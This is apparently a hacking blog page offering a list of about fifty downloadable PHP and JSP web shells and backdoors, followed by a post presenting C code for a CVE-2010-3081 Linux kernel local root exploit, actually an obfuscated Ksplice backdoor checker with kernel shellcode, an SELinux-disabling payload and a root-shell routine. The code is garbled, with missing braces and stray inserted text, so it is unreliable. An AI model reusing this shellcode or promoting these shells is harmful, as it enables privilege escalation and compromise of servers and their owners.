Beyaz_Hacker Shell	txt.zip
Angel Shell	txt.zip
Tryag Shell	txt.zip
Fatal Shell	txt.zip
5.2.9 PHP Shell	txt.zip
Uploader Shell	txt.zip
Sniper Sa Shell	txt.zip
Sim Shell	txt.zip
Simple CMD Shell	txt.zip
Simple PHP Backdoor Shell	txt.zip
Safe Mode Bypass Shell	txt.zip
S72 Shell	txt.zip
Ru24 Post Shell	txt.zip
PWS Shell	txt.zip
Private I2Lue Shell	txt.zip
CPHP Remote View Shel	txt.zip
PHP Jackal Shell	txt.zip
PHP Include-W Shell	txt.zip
PHP Backdoor Shell	txt.zip
Phantasma Shell	txt.zip
PH Vayv Shell	txt.zip
Nst View Shell	txt.zip
Nix Remote Shell	txt.zip
Network File Manager Shell	txt.zip
Ncc Shell	txt.zip
Mysql Tool Shell	txt.zip
Mysql Web Interface 0.8 Shell	txt.zip
Mysql Interface v1.0 Shell	txt.zip
My Shell	txt.zip
Moroccan Spamers Shell	txt.zip
Matamu Shell	txt.zip
Load Shell	txt.zip
Lama Shell	txt.zip
Kadot Universal Shell	txt.zip
Jsp Shell	txt.zip
Iron Shell	txt.zip
Hxps Shell	txt.zip
H4ntu Shell	txt.zip
GFS-SH Shell	txt.zip
GFS-Ver Shell	txt.zip
Dx Shell	txt.zip
DTool Pro Shell	txt.zip
Dive 1.0 Shell	txt.zip
Dc3 Security Crew Shell	txt.zip
Cyber Shell	txt.zip
CTT Shell	txt.zip
Crystal Shell	txt.zip
Backup Sql Shell	txt.zip
Azrail PHP Shell	txt.zip

Script kernel-2.6.18-164 Local 2010 Exploit

Post by Unknown Posted on 21:00 with No comments

#include <poll.h>

#include <string.h>

#include <unistd.h>

#include <sys/types.h>

#include <stdlib.h>

#include <sys/wait.h>

#include <sys/uts****.h>

#include <sys/socket.h>

#include <sched.h>

#include <netinet/in.h>

#include <stdio.h>

#include <sys/stat.h>

#include <fcntl.h>

#include <sys/mman.h>

#include <sys/ipc.h>

#include <sys/msg.h>

#include <sys/resource.h>

#include <errno.h>

#define _GNU_SOURCE

#define __dgdhdytrg55 unsigned int

#define __yyrhdgdtfs66ytgetrfd unsigned long long

#define __dhdyetgdfstreg__ memcpy

#define BANNER "Diagnostic tool for public CVE-2010-3081 exploit -- Ksplice, Inc.\n" \

"(see http://www.ksplice.com/uptrack/cve-2010-3081)\n" \

"\n"

#define KALLSYMS "/proc/kallsyms"

#define TMAGIC_66TDFDRTS "/proc/timer_list"

#define SELINUX_PATH "/selinux/enforce"

#define RW_FOPS "timer_list_fops"

#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"

#define PREPARE_GGDTSGFSRFSD "prepare_creds"

#define OVERRIDE_GGDTSGFSRFSD "override_creds"

#define REVERT_DHDGTRRTEFDTD "revert_creds"

#define Y0Y0SMAP 0x100000UL

#define Y0Y0CMAP 0x200000UL

#define Y0Y0STOP (Y0Y0SMAP+0xFFC)

#define J0J0S 0x00200000UL

#define J0J0R00T 0x002000F0UL

#define PAGE_SIZE 0x1000

#define KERN_DHHDYTMLADSFPYT 0x1

#define KERN_DGGDYDTEGGETFDRLAK 0x2

#define KERN_HHSYPPLORQTWGFD 0x4

#define KERN_DIS_GGDYYTDFFACVFD_IDT 0x8

#define KERN_DIS_DGDGHHYTTFSR34353_FOPS 0x10

#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM 0x20

#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX 0x40

#define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5"))

#define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0)

#define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0)

/* #define __print_verbose(s) do { fprintf(stdout, "%s", s); } while(0) */

#define __print_verbose(s) do { } while (0)

#define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0)

#define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0)

static char buffer[1024];

static int s;

static int flags=0;

volatile static socklen_t magiclen=0;

static int useidt=1, usefops=0, uselsm=0;

static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0};

static __dgdhdytrg55 _m_cpu_off=0;

static char krelease[64];

static char kversion[128];

#define R0C_0FF 14

static char ttrg0ccc[]=

"\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\ xf6\xbe\x41\x41\x41\x41"

"\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\ x75\x15\x3b\x70\x0c"

"\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\ x08\x89\x58\x0c\xeb\x11"

"\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\ x00\x74\x02"

"\xeb\xcc\x5e\x5b\x5f\x59\xc3";

#define R0YTTTTUHLFSTT_OFF1 5

#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21

#define R0TDGFSRSLLSJ_SHSYSTGD 45

char r1ngrrrrrrr[]=

"\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\ x41\xff\xd3"

"\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\ x42\x42"

"\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\ x89\xc7"

"\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43"

"\xff\xd3\x5f\x5f\x5a\x5b\xc3";

#define RJMPDDTGR_OFF 13

#define RJMPDDTGR_DHDYTGSCAVSF 7

#define RJMPDDTGR_GDTDGTSFRDFT 25

static char ttrfd0[]=

"\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"

"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\ xd0"

"\x58\x5f"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\xc3";

/* implement selinux bypass for IDT ! */

#define RJMPDDTGR_OFF_IDT 14

#define RJMPDDTGR_DYHHTSFDARE 8

#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27

static char ruujhdbgatrfe345[]=

"\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\ x00"

"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\ xd0"

"\x0f\x01\xf8"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x48\xcf";

#define CJE_4554TFFDTRMAJHD_OFF 10

#define RJMPDDTGR_AYYYDGTREFCCV7761_OF 23

static char dis4blens4sel1nuxhayettgdr64545[]=

"\x41\x52\x50"

"\xb8\x00\x00\x00\x00"

"\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41"

"\x41\x89\x02"

"\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42"

"\x41\x89\x02"

"\x58\x41\x5a";

/* rhel LSM stuffs */

#define RHEL_LSM_OFF 98

struct LSM_rhel

{

__yyrhdgdtfs66ytgetrfd selinux_ops;

__yyrhdgdtfs66ytgetrfd capability_ops;

__yyrhdgdtfs66ytgetrfd dummy_security_ops;

__yyrhdgdtfs66ytgetrfd selinux_enforcing;

__yyrhdgdtfs66ytgetrfd audit_enabled;

const char *krelease;

const char *kversion;

};

struct LSM_rhel known_targets[4]=

{

0xffffffff8031e600ULL,

0xffffffff8031fec0ULL,

0xffffffff804acc00ULL,

0xffffffff804af960ULL,

0xffffffff8049b124ULL,

"2.6.18-164.el5",

"#1 SMP Thu Sep 3 03:28:30 EDT 2009" // to manage minor/bug fix changes

{

0xffffffff8031f600ULL,

0xffffffff80320ec0ULL,

0xffffffff804afc00ULL,

0xffffffff804b2960ULL,

0xffffffff8049e124ULL,

"2.6.18-164.11.1.el5",

"#1 SMP Wed Jan 6 13:26:04 EST 2010"

{

0xffffffff805296a0ULL,

0xffffffff8052af60ULL,

0xffffffff806db1e0ULL,

0xffffffff806ddf40ULL,

0xffffffff806d5324ULL,

"2.6.18-164.11.1.el5xen",

"#1 SMP Wed Jan 20 08:06:04 EST 2010" // default xen

{

0xffffffff8031f600ULL,// d selinux_ops

0xffffffff80320ec0ULL,// d capability_ops

0xffffffff804afc00ULL,// B dummy_security_ops

0xffffffff804b2960ULL,// B selinux_enforcing

0xffffffff8049e124ULL,// B audit_enabled

"2.6.18-164.11.1.el5",

"#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL

}

};

static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt;

static int isSelinuxEnabled()

{

FILE *selinux_f;

selinux_f = fopen(SELINUX_PATH, "r");

if(selinux_f == NULL)

{

if(errno == EPERM)

return 1;

else

return 0;

}

fclose(selinux_f);

return 1;

}

static int wtfyourunhere_heee(char *out_release, char* out_version)

{

int ret; const char*ptr;

int count=0;

char r[32], *bptr;

struct uts**** buf;

ret = u****(&buf);

if(ret < 0)

return -1;

strcpy(out_release, buf.release);

strcpy(out_version, buf.version);

ptr = buf.release;

bptr = r;

memset(r, 0x00, sizeof(r));

while(*ptr)

{

if(count == 2)

{

if(*ptr >= '0' && *ptr <= '9')

*bptr++ = *ptr;

else

break;

}

if(*ptr == '.')

count++;

ptr++;

}

if(strlen(r) < 1 || !atoi(r))

return -1;

return atoi(r);

}

static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table)

{

*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing;

*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled;

__dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1);

__dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1);

}

static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* file****, int ignore_flag)

{

FILE *ka;

char line[512];

char reloc_a[64];

char reloc[64];

if(!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag)

return 0;

ka = fopen(file****, "r");

if(!ka)

return 0;

while(fgets(line, 512, ka) != NULL)

{

char *l_p = line;

char *ra_p = reloc_a;

char *r_p = reloc;

memset(reloc, 0x00, sizeof(reloc));

memset(reloc_a, 0x00, sizeof(reloc_a));

while(*l_p != ' ' && (ra_p - reloc_a) < 64)

*ra_p++ = *l_p++;

l_p += 3;

while(*l_p != ' ' && *l_p != '\n' && *l_p != '\t' && (r_p - reloc) < 64)

*r_p++ = *l_p++;

if(!strcmp(reloc, s))

{

return strtoull(reloc_a, NULL, 16);

}

return 0;

}

static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s)

{

return get_sym_ex(s, KALLSYMS, 0);

}

static int parse_cred(const char* val)

{

int i=0;

const char* p = val;

char local[64], *l;

for(i=0; i<3; i++)

{

memset(local, 0x00, sizeof(local));

l = local;

while(*p && *p != ',')

*l++ = *p++;

if(!(*p) && i != 2)

return -1;

_m_cred[i] = strtoull(local, NULL, 16);

p++;

}

return 0;

}

#define SELINUX_OPS "selinux_ops"

#define DUMMY_SECURITY_OPS "dummy_security_ops"

#define CAPABILITY_OPS "capability_ops"

#define SELINUX_ENFORCING "selinux_enforcing"

#define AUDIT_ENABLED "audit_enabled"

struct LSM_rhel *lsm_rhel_find_target(int check_rhel)

{

int i;

char mapbuf[128];

struct LSM_rhel *lsm = &(known_targets[0]);

if(check_rhel && !isRHHGDPPLADSF(krelease))

{

__pppp_tegddewyfg("!!! Not a RHEL kernel, will skip LSM method \n");

return NULL;

}

__print_verbose("$$$ Looking for known RHEL kernels.. \n");

for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++)

{

if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion))

{

__gggdfstsgdt_dddex("$$$ Known target kernel: %s %s \n", lsm->krelease, lsm->kversion);

return lsm;

}

__print_verbose("$$$ Locating symbols for new target...\n");

strcpy(mapbuf, "/boot/System.map-");

strcat(mapbuf, krelease);

dyn4nt4n1labeggeyrthryt.selinux_ops = get_sym_ex(SELINUX_OPS, mapbuf, 1);

dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);

dyn4nt4n1labeggeyrthryt.capability_ops = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);

dyn4nt4n1labeggeyrthryt.selinux_enforcing = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);

dyn4nt4n1labeggeyrthryt.audit_enabled = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);

if(!dyn4nt4n1labeggeyrthryt.selinux_ops ||

!dyn4nt4n1labeggeyrthryt.dummy_security_ops ||

!dyn4nt4n1labeggeyrthryt.capability_ops ||

!dyn4nt4n1labeggeyrthryt.selinux_enforcing ||

!dyn4nt4n1labeggeyrthryt.audit_enabled)

return NULL;

return &dyn4nt4n1labeggeyrthryt;

}

void error_no_symbol(const char *symbol)

{

fprintf(stderr,

"!!! Could not find symbol: %s\n"

"\n"

"A symbol required by the published exploit for CVE-2010-3081 is not\n"

"provided by your kernel. The exploit would not work on your system.\n",

symbol);

exit(-1);

}

static void put_your_hands_up_hooker(int argc, char *argv[])

{

int fd,ver,ret;

char __b[16];

fd = open(KALLSYMS, O_RDONLY);

ret = read(fd, __b, 16); // dummy read

if((fd >= 0 && ret > 0))

{

__print_verbose("$$$ can read /proc/kallsyms, will use for convenience\n"); // d0nt p4tch m3 br0

flags |= KERN_HHSYPPLORQTWGFD;

}

close(fd);

ver = wtfyourunhere_heee(krelease, kversion);

if(ver < 0)

__yyy_tegdtfsrer("!!! u**** failed\n");

__gggdfstsgdt_dddex("$$$ Kernel release: %s\n", krelease);

if(argc != 1)

{

while( (ret = getopt(argc, argv, "sflc:kCant See Images:")) > 0)

{

switch(ret)

{

case 'f':

flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTD FFACVFD_IDT;

break;

case 'l':

flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR3 4353_FOPS;

break;

case 'c':

if(!optarg || parse_cred(optarg) < 0)

__yyy_tegdtfsrer("!!! Unable to parse cred codes\n");

break;

case 'k':

if(optarg)

_m_fops = strtoull(optarg, NULL, 16);

else

__yyy_tegdtfsrer("!!! Unable to parse fops numbers\n");

break;

case 's':

if(!isSelinuxEnabled())

__pppp_tegddewyfg("??? -s ignored: SELinux not enabled\n");

else

flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;

break;

case 'o':

if(optarg)

_m_cpu_off = strtoull(optarg, NULL, 16);

else

__yyy_tegdtfsrer("!!! Unable to parse cpu_off numbers\n");

break;

}

if(ver >= 29) // needs cred structure

{

flags |= KERN_DGGDYDTEGGETFDRLAK;

if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])

{

_m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD);

_m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD);

_m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD);

}

if(!_m_cred[0])

error_no_symbol("prepare_creds");

if(!_m_cred[1])

error_no_symbol("override_creds");

if(!_m_cred[2])

error_no_symbol("revert_creds");

__print_verbose("$$$ Kernel credentials detected\n");

*((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0];

*((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1];

*((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2];

}

if(ver >= 30) // needs cpu offset

{

flags |= KERN_DHHDYTMLADSFPYT;

if(!_m_cpu_off)

_m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);

if(!_m_cpu_off)

error_no_symbol("per_cpu__current_task");

__print_verbose("$$$ Kernel per_cpu relocs enabled\n");

*((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off;

*((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off;

}

static void env_prepare(int argc, char* argv[])

{

put_your_hands_up_hooker(argc, argv);

if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS)) // try fops

{

__print_verbose("??? Trying the timer_list_fops method\n");

if(!_m_fops)

_m_fops = get_sym(RW_FOPS);

/* TODO: do RW check for newer -mm kernels which has timer_list_struct RO

* Thanks to the guy who killed this vector... you know who you areCant See Images

* Lucky for you, there are moreCant See Images

if(_m_fops)

{

usefops=1;

}

if(!(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) // try lsm(rhel)

{

__print_verbose("??? Trying the LSM method\n");

curr_target = lsm_rhel_find_target(1);

if(!curr_target)

{

__print_verbose("!!! Unable to find target for LSM method\n");

}

else {

uselsm=1;

}

if(useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))

{

// -i flag

curr_target = lsm_rhel_find_target(0);

if(!curr_target)

{

__pppp_tegddewyfg("!!! Unable to find target: continue without SELinux disabled\n");

/* remove Selinux Flag */

flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;

}

if(!usefops && !useidt && !uselsm)

__yyy_tegdtfsrer("!!! All exploit methods failed.\n");

}

static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack)

{

int socklen_l = 8 + stack - addr - 16;

return socklen_l;

}

static void __setmcbuffer(__dgdhdytrg55 value)

{

int i;

__dgdhdytrg55 *p = (__dgdhdytrg55*)buffer;

for(i=0; i<sizeof(buffer)/sizeof(void*); i++)

*(p+i) = value;

}

static void y0y0stack()

{

void* map = mmap((void*)Y0Y0SMAP,

PAGE_SIZE,

PROT_READ|PROT_WRITE,

MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,

-1,0);

if(MAP_FAILED == map)

__xxxfdgftr_hshsgdt("mmap");

}

static void y0y0code()

{

void* map = mmap((void*)Y0Y0CMAP,

PAGE_SIZE,

#ifdef TRY_REMAP_DEFAULT

PROT_READ|PROT_WRITE,

#else

PROT_READ|PROT_WRITE|PROT_EXEC,

#endif

MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,

-1,0);

if(MAP_FAILED == map)

__xxxfdgftr_hshsgdt("mmap");

}

static int rey0y0code(unsigned long old)

{

int fd;

void *map;

volatile char wizard;

char cwd[1024];

getcwd(cwd, sizeof(cwd));

strcat(cwd, "/__tmpfile");

unlink(cwd);

fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU);

if(fd < 0)

return -1;

write(fd, (const void*)old, PAGE_SIZE);

if(munmap((void*)old, PAGE_SIZE) < 0)

return -1;

map = mmap((void*)old,

PAGE_SIZE,

PROT_READ|PROT_EXEC,

MAP_PRIVATE|MAP_FIXED,

fd,0);

if(map == MAP_FAILED)

return -1;

/* avoid lazy page fault handler

* Triple Fault when using idt vector

* and no pages are already mappedCant See Images

wizard = *((char*)old);

unlink(cwd);

return wizard;

}

void finish_shellcode()

{

/* set shellcode level 2 */

if(flags & KERN_DGGDYDTEGGETFDRLAK)

{

__print_verbose("$$$ Using cred shellcode\n");

__dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr));

}

else

{

__print_verbose("$$$ Using standard shellcode\n");

__dhdyetgdfstreg__((void*)J0J0R00T, ttrg0ccc, sizeof(ttrg0ccc));

*((unsigned int*)(J0J0R00T + R0C_0FF)) = getuid();

}

#ifdef TRY_REMAP_DEFAULT

if(rey0y0code(Y0Y0CMAP) < 0)

__yyy_tegdtfsrer("!!! Unable to remap\n");

#endif

}

int method_idt_main()

{

__yyrhdgdtfs66ytgetrfd *patch;

__print_verbose("$$$ Building shellcode - IDT method\n");

patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);

*patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);

if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)

{

__print_verbose("$$$ including code to disable SELinux\n");

p4tch_sel1nux_codztegfaddczda(curr_target);

}

__dhdyetgdfstreg__((void*)J0J0S, ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345));

finish_shellcode();

asm volatile("int $0xdd\t\n");

return (getuid() == 0);

}

int method_idt()

{

/* method_idt_main() crashes if no backdoor is present, so protect ourselves */

int pid;

pid = fork();

if (pid < 0) {

__xxxfdgftr_hshsgdt("!!! fork() failed");

return 0; // error

}

if (pid == 0) {

int r;

struct rlimit rlim = {0, 0};

setrlimit(RLIMIT_CORE, &rlim);

r = method_idt_main();

exit(r ? 0 : 1);

}

int status;

waitpid(pid, &status, 0);

if (status == 0)

return method_idt_main();

else

return 0;

}

void prepare_fops_lsm_shellcode()

{

__yyrhdgdtfs66ytgetrfd *patch;

__print_verbose("$$$ Building shellcode - fops/LSM method\n");

patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF);

*patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);

__setmcbuffer(J0J0S);

if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))

{

__print_verbose("$$$ including code to disable SELinux\n");

p4tch_sel1nux_codztegfaddczda(curr_target);

}

__dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0));

finish_shellcode();

}

int method_fops()

{

int fd;

struct pollfd pfd;

prepare_fops_lsm_shellcode();

fd = open(TMAGIC_66TDFDRTS, O_RDONLY);

if(fd < 0)

__xxxfdgftr_hshsgdt("!!! could not open /proc/timer_list");

pfd.fd = fd;

pfd.events = POLLIN | POLLOUT;

poll(&pfd, 1, 0);

return (getuid() == 0);

}

int method_lsm()

{

int msqid;

prepare_fops_lsm_shellcode();

msqid = msgget(0, IPC_PRIVATE|0600);

if(msqid < 0)

__xxxfdgftr_hshsgdt("!!! msgget() failed");

msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it

return (getuid() == 0);

}

int main(int argc, char*argv[])

{

int done;

printf(BANNER);

if (getuid() == 0) {

fprintf(stderr, "!!! Must run as non-root.\n");

return 1;

}

env_prepare(argc, argv);

y0y0stack();

y0y0code();

done = 0;

__pppp_tegddewyfg("$$$ Backdoor in LSM (1/3): ");

if (uselsm) {

__pppp_tegddewyfg("checking...");

done = method_lsm();

if (done)

__pppp_tegddewyfg("PRESENT\n");

else

__pppp_tegddewyfg("not present.\n");

} else {

__pppp_tegddewyfg("not available.\n");

}

if (!done) {

__pppp_tegddewyfg("$$$ Backdoor in timer_list_fops (2/3): ");

if (usefops) {

__pppp_tegddewyfg("checking...");

done = method_fops();

if (done)

__pppp_tegddewyfg("PRESENT\n");

else

__pppp_tegddewyfg("not present.\n");

} else {

__pppp_tegddewyfg("not available.\n");

}

if (!done) {

__pppp_tegddewyfg("$$$ Backdoor in IDT (3/3): ");

if (useidt) {

__pppp_tegddewyfg("checking...");

fflush(stdout);

done = method_idt();

if (done)

__pppp_tegddewyfg("PRESENT\n");

else

__pppp_tegddewyfg("not present.\n");

} else {

__pppp_tegddewyfg("NOT CHECKING\n");

}

munmap((void*)Y0Y0CMAP, PAGE_SIZE);

/* exec */

if(getuid() == 0)

{

pid_t pid;

printf("\n"

"Your in-memory kernel HAS A BACKDOOR that may have been left\n"

"by the published exploit for CVE-2010-3081.\n"

"\n"

"More information is available at\n"

" http://www.ksplice.com/uptrack/cve-2010-3081\n"

);

if (0) {

/* spawn root shell as demonstration */

pid = fork();

if(pid == 0)

{

char *args[] = {"/bin/sh", "-i", NULL};

char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTFILESIZE=0",

"PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };

execve("/bin/sh", args, envp);

}

else

{

int status;

waitpid(pid, &status, 0);

}

else {

printf("\n"

"Your system is free from the backdoors that would be left in memory\n"

"by the published exploit for CVE-2010-3081.\n");

}

close(s);

return 0;

}

IamNot-Hacker

Labels

Followers

WP Hacked By Symlink

Smart Hunter v.1.4.3

WHCMS Server Password Decoder

Script Symlink Killer

[PHP] Subdomain Maker

cPanel WHM Acc Creator

Shell LENGKAP

Script kernel-2.6.18-164 Local 2010 Exploit

Popular Posts

Visitors

Test Footer

Random post

Terpopuler